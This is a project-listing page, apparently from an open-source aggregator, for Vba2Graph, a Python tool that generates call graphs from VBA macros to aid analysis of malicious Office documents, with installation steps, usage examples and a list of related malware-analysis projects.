MalwareCantFly / Vba2graph
Licence: epl-2.0
Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents.
Stars: ✭ 245
Programming Languages
python
139335 projects - #7 most used programming language
Labels
Projects that are alternatives of or similar to Vba2graph
Antidebugging
A collection of c++ programs that demonstrate common ways to detect the presence of an attached debugger.
Stars: ✭ 161 (-34.29%)
Mutual labels: malware-analysis
Malwaresearch
A command line tool to find malwares on http://openmalware.org
Stars: ✭ 190 (-22.45%)
Mutual labels: malware-analysis
Antidbg
A bunch of Windows anti-debugging tricks for x86 and x64.
Stars: ✭ 177 (-27.76%)
Mutual labels: malware-analysis
Detect It Easy
Program for determining types of files for Windows, Linux and MacOS.
Stars: ✭ 2,982 (+1117.14%)
Mutual labels: malware-analysis
Cmulator
Cmulator is ( x86 - x64 ) Scriptable Reverse Engineering Sandbox Emulator for shellcode and PE binaries . Based on Unicorn & Zydis Engine & javascript
Stars: ✭ 197 (-19.59%)
Mutual labels: malware-analysis
Docker Misp
Automated Docker MISP container - Malware Information Sharing Platform and Threat Sharing
Stars: ✭ 148 (-39.59%)
Mutual labels: malware-analysis
Nao
Simple No-meaning Assembly Omitter for IDA Pro (This is just a prototype)
Stars: ✭ 228 (-6.94%)
Mutual labels: malware-analysis
Apkfile
Android app analysis and feature extraction library
Stars: ✭ 190 (-22.45%)
Mutual labels: malware-analysis
Threat Hunting
Personal compilation of APT malware from whitepaper releases, documents and own research
Stars: ✭ 219 (-10.61%)
Mutual labels: malware-analysis
Probedroid
A SDK for the creation of analysis tools without obtaining app source code in order to profile runtime performance, examine code coverage, and track high-risk behaviors of a given app on Android 5.0 and above.
Stars: ✭ 182 (-25.71%)
Mutual labels: malware-analysis
Attack monitor
Endpoint detection & Malware analysis software
Stars: ✭ 186 (-24.08%)
Mutual labels: malware-analysis
Lisa
Sandbox for automated Linux malware analysis.
Stars: ✭ 177 (-27.76%)
Mutual labels: malware-analysis
Radare2
UNIX-like reverse engineering framework and command-line toolset
Stars: ✭ 15,412 (+6190.61%)
Mutual labels: malware-analysis
Malwaretrainingsets
Free Malware Training Datasets for Machine Learning
Stars: ✭ 151 (-38.37%)
Mutual labels: malware-analysis
Drsemu
DrSemu - Sandboxed Malware Detection and Classification Tool Based on Dynamic Behavior
Stars: ✭ 237 (-3.27%)
Mutual labels: malware-analysis
Xapkdetector
APK/DEX detector for Windows, Linux and MacOS.
Stars: ✭ 208 (-15.1%)
Mutual labels: malware-analysis
Vba2Graph
A tool for security researchers, who waste their time analyzing malicious Office macros.
Generates a VBA call graph, with potential malicious keywords highlighted.
Allows for quick analysis of malicous macros, and easy understanding of the execution flow.
Features
- Keyword highlighting
- VBA Properties support
- External function declarion support
- Tricky macros with "_Change" execution triggers
- Fancy color schemes!
Pros
✓ Pretty fast
✓ Works well on most malicious macros observed in the wild
Cons
✗ Static (dynamicaly resolved calls would not be recognized)
Examples
Example 1:
Trickbot downloader - utilizes object Resize event as initial trigger, followed by TextBox_Change triggers.
Example 2:
Check out the Examples folder for more cases.
Installation
Install oletools:
https://github.com/decalage2/oletools/wiki/Install
Install Python Requirements
pip3 install -r requirements.txt
Install Graphviz
Windows
Install Graphviz:
https://graphviz.gitlab.io/download/#windows
Add "dot.exe" to PATH env variable or just:
set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin
Mac
brew install graphviz
Ubuntu
sudo apt-get install graphviz
Arch
sudo pacman -S graphviz
Usage
usage: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE)
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
output folder (default: "output")
-c {0,1,2,3}, --colors {0,1,2,3}
color scheme number [0, 1, 2, 3] (default: 0 - B&W)
-i INPUT, --input INPUT
olevba generated file or .bas file
-f FILE, --file FILE Office file with macros
Usage Examples (All Platforms)
Please note that a Python 2 release is availiable in the Releases section, but is no longer supported.
# Generate call graph directly from an Office file with macros [tnx @doomedraven]
python3 vba2graph.py -f malicious.doc -c 2
# Generate vba code using olevba then pipe it to vba2graph
olevba3 malicious.doc | python3 vba2graph.py -c 1
# Generate call graph from VBA code
python3 vba2graph.py -i vba_code.bas -o output_folder
Output
You'll get 4 folders in your output folder:
- png: the actual graph image you are looking for
- svg: same graph image, just in vector graphics
- dot: the dot file which was used to create the graph image
- bas: the VBA functions code that was recognized by the script (for debugging)
Batch Processing
Mac/Linux:
batch.sh script file is attached for running olevba and vba2graph on an input folder of malicious docs.
Deletes output dir. use with caution.
License
The code in this project is licensed under the EPL-2.0 License.
This project is utilizing the following third-party open-source tools and libraries. Please note their respective licenses.
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].